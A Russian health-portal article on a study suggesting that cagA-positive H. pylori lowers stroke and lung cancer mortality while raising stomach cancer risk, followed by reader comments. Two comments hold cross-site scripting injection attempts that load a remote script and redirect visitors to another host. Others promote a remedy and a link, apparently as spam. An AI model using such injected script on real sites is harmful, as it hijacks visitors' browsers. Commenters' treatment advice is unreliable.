Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Язва желудка защищает от ...  >>  Язва желудка защищает от инфаркта и рака
 
Обратная связь
 

Язва желудка защищает от инфаркта и рака

Размер шрифта
29 марта 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Нью-йоркская группа исследователей обнаружила, что один из самых вирулентных штаммов бактерии Helicobacter pylori (H. Pylori) не влияет на общую смертность, а, напротив, может уменьшать риск развития инсульта и некоторых опухолей. Каким же образом?

Не все так просто

Для лучшего понимания того, как именно H.pylori влияет на общую смертность (т.е. смертность от любых причин), исследователи годами наблюдали за пациентами-носителями этой бактерии, включая особые вирулентные штаммы, в чьем геноме имеется ген cagA. В этом исследовании были задействованы примерно десять тысяч пациентов, и длилось оно порядка двенадцати лет. Выяснилось, что это носительство никак не отражается на уровне общей смертности, который ничуть не превысил таковой у лиц, не зараженных H.pylori. Однако, в подтверждение всем предыдущим данным, выяснилось, что H.pylori в 40 раз увеличивает смертность от рака желудка.

C другой стороны, обнаружилось, что носительство cagA-штамма H.pylori на 55% снижает вероятность умереть от инсульта и на 45% – от рака легких – в сравнении с теми пациентами, у которых эта бактерия не обнаруживалась.

Это удивительное открытие, поскольку ранее H.pylori считалась исключительно вредоносной бактерий, которая является причиной развития таких заболеваний, как гастрит, язвенная болезнь и рак желудка. Тем не менее, один из вирулентных штаммов, в геноме которого присутствует особый ген cagA, взаимодействует с организмом человека в более неоднозначном ключе.

Если говорить о H.pylori в целом, то эта бактерия обитает в слизистой желудка у более, чем половины населения планеты. Особенно это касается развивающихся стран, в которых не все всегда бывает благополучно с санитарно-эпидемиологической точки зрения, и в которых антибиотики не применяются столь широко, как в развитых. Обычно заражение хеликобактером происходит в раннем детском возрасте (до десяти лет), и передается он от членов семьи.

В чем же причины двуликости H.pylori

К сожалению, на данный момент неизвестно, какие механизмы обуславливают положительное влияние H.pylori на здоровье и какую роль в этом играет ген cagA. Некоторые специалисты полагают, что, возможно, это связано с активацией особой популяции регуляторных Т-лимфоцитов в ответ на инфекционный процесс.

Как бы то ни было, исследования в этом направлении должны продолжиться, и однажды мы узнаем ответ.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

26 марта 2015 в 13:35

Цитировать   |   Пожаловаться

а пока выясняются особенности воздействия пилори на организм нам что делать?.. вред то от нее ощутимый(( чтобы без язвы и рака желудка пока ведутся исследования все-таки буду что-то предпринимать от этой бактерии..

2 - Гость

26 марта 2015 в 15:50

Цитировать   |   Пожаловаться

Мда.. непонятно, кому верить, где-то читала, что наоборот хеликобактер провоцирует инсульт. От одного рака защизает, другой провоцирует.

В общем не думаю, что стоит верить этим исследователям. Симптомы действительно есть, поэтому буду дальше выводить бактерии. Уже вторую неделю принимаю хелинорм и соблюдаю диету, чувствую себя лучше, это самое главное.

3 - Гость

27 марта 2015 в 12:44

Цитировать   |   Пожаловаться

Вот тоже думаю, что пока не докажут, я уж пожалуй буду выводить эту бактерию.. о влиянии на инсульт пока не понятно, а то что рак желудка может вызывать уже установлено

4 - Гость

27 марта 2015 в 14:31

Цитировать   |   Пожаловаться

Согласна со всеми, а кто-нибудь знает, чем их выводить? Кому-нибудь удалось от них полностью избавиться?

5 - Гость

30 марта 2015 в 13:04

Цитировать   |   Пожаловаться

Гость 27 марта 2015 в 14:31
Согласна со всеми, а кто-нибудь знает, чем их выводить? Кому-нибудь удалось от них полностью избавиться?
 Ну вот тут про хелинорм писали, попробуйте и вы) я принимала курс с этой же целью, результаты по сдаче повторных анализов были хорошие, тут конечно индивидуально нужно подбирать, но меня вполне хелинорм устроил

6 - zzzzzz

30 июня 2015 в 19:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

7 - zzzzzz

30 июня 2015 в 23:21

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

8 - Гость

03 декабря 2016 в 21:29

Цитировать   |   Пожаловаться

странное мнение.. как по мне нужно лечить язву http://zheludoc.ru/ слышала от врачей что лучше когда язва болит и дает о себе знать....

Статьи

       
Как лечить язву   Видеокапсульная эндоскопия: ответы специалиста   Синдром раздраженного кишечника   Что делает гастроэнтеролог, если у него запор  
26 октября 2011Клубника защитит желудок 28 июля 2011Шунтирование желудка меняет вкусовые пристрастия
 
03 октября 2013Результаты благотворительного марафона «Всем миром» 28 марта 2013Язва желудка защищает от инфаркта и рака
 

Слайдшоу

1
Все, что нужно знать о желудке
Что ваш стул говорит о вас
Эффективные способы улучшения пищеварения

Тесты

Знаете ли вы, как работает ваш желудок?
Что вы знаете о поджелудочной железе?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.